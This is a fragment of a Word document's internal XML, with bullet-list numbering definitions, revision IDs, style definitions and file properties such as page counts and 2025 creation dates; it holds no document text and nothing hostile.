      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Symbol" w:cstheme="minorBidi"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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="15981D44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72441C72"/>
    <w:lvl w:ilvl="0" w:tplc="79E60F62">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Symbol" w:cstheme="minorBidi"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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1E4D1D6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="16A64378"/>
    <w:lvl w:ilvl="0" w:tplc="41526FB0">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380D0CE3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E654AD52"/>
    <w:lvl w:ilvl="0" w:tplc="34786722">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Symbol" w:cstheme="minorBidi"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39E832B9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1DEAF6D6"/>
    <w:lvl w:ilvl="0" w:tplc="06A44492">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45B279F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7B64026"/>
    <w:lvl w:ilvl="0" w:tplc="10F02292">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56457037"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FAF2D0C4"/>
    <w:lvl w:ilvl="0" w:tplc="130ADDEA">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56820FAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39AE30B6"/>
    <w:lvl w:ilvl="0" w:tplc="39AA7EF0">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599E510F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="157482BA"/>
    <w:lvl w:ilvl="0" w:tplc="A54618EA">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Symbol" w:cstheme="minorBidi"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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5F895108"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3F6EE20"/>
    <w:lvl w:ilvl="0" w:tplc="A9E68410">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Symbol" w:cstheme="minorBid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16cid:durableId="1505392982">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1354652982">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2043745344">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="198979191">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="249317824">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="624191071">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="729772403">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1436437664">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1374384988">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1418359742">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2068138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3AA"/>
    <w:rsid w:val="00056F63"/>
    <w:rsid w:val="00073435"/>
    <w:rsid w:val="000F65D6"/>
    <w:rsid w:val="00123800"/>
    <w:rsid w:val="001565FC"/>
    <w:rsid w:val="001A5EFA"/>
    <w:rsid w:val="001B33B6"/>
    <w:rsid w:val="001B56D3"/>
    <w:rsid w:val="002334F7"/>
    <w:rsid w:val="00313315"/>
    <w:rsid w:val="00352171"/>
    <w:rsid w:val="003770C1"/>
    <w:rsid w:val="003B231E"/>
    <w:rsid w:val="003C2C82"/>
    <w:rsid w:val="003D762C"/>
    <w:rsid w:val="003E24FF"/>
    <w:rsid w:val="004D061A"/>
    <w:rsid w:val="004E64C0"/>
    <w:rsid w:val="004F240E"/>
    <w:rsid w:val="00505E36"/>
    <w:rsid w:val="005D5A4B"/>
    <w:rsid w:val="005E23AA"/>
    <w:rsid w:val="005F65AB"/>
    <w:rsid w:val="00613592"/>
    <w:rsid w:val="0063209D"/>
    <w:rsid w:val="00633715"/>
    <w:rsid w:val="006A432C"/>
    <w:rsid w:val="00741093"/>
    <w:rsid w:val="00741548"/>
    <w:rsid w:val="00747B68"/>
    <w:rsid w:val="00751B7B"/>
    <w:rsid w:val="007737DC"/>
    <w:rsid w:val="007838E4"/>
    <w:rsid w:val="007917BF"/>
    <w:rsid w:val="00864647"/>
    <w:rsid w:val="008647F4"/>
    <w:rsid w:val="0086540B"/>
    <w:rsid w:val="0087222C"/>
    <w:rsid w:val="008750A7"/>
    <w:rsid w:val="00887774"/>
    <w:rsid w:val="0088780D"/>
    <w:rsid w:val="0089284C"/>
    <w:rsid w:val="008C2672"/>
    <w:rsid w:val="008F0E5F"/>
    <w:rsid w:val="00995B54"/>
    <w:rsid w:val="009F406B"/>
    <w:rsid w:val="009F4346"/>
    <w:rsid w:val="00A511AB"/>
    <w:rsid w:val="00AA240E"/>
    <w:rsid w:val="00B36F79"/>
    <w:rsid w:val="00B60E1C"/>
    <w:rsid w:val="00B8718F"/>
    <w:rsid w:val="00BC742C"/>
    <w:rsid w:val="00C150CC"/>
    <w:rsid w:val="00C5167D"/>
    <w:rsid w:val="00CA1A71"/>
    <w:rsid w:val="00CA2D6C"/>
    <w:rsid w:val="00CB573E"/>
    <w:rsid w:val="00CD1523"/>
    <w:rsid w:val="00D72201"/>
    <w:rsid w:val="00E01B71"/>
    <w:rsid w:val="00E62E7F"/>
    <w:rsid w:val="00E92223"/>
    <w:rsid w:val="00F05CDA"/>
    <w:rsid w:val="00F479A4"/>
    <w:rsid w:val="00F60999"/>
    <w:rsid w:val="00F8177D"/>
    <w:rsid w:val="00FC343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5264"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D38FB9F1-7B9A-406E-945A-869E8D07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lt-L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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3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3AA"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="005E23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3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3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3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3AA"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="005E23AA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005E23AA"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="005E23AA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="005E23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3AA"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="005E23AA"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005E23A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48</Pages>
  <Words>25248</Words>
  <Characters>14392</Characters>
  <DocSecurity>0</DocSecurity>
  <Lines>119</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2025-10-13T07:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-19T21:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>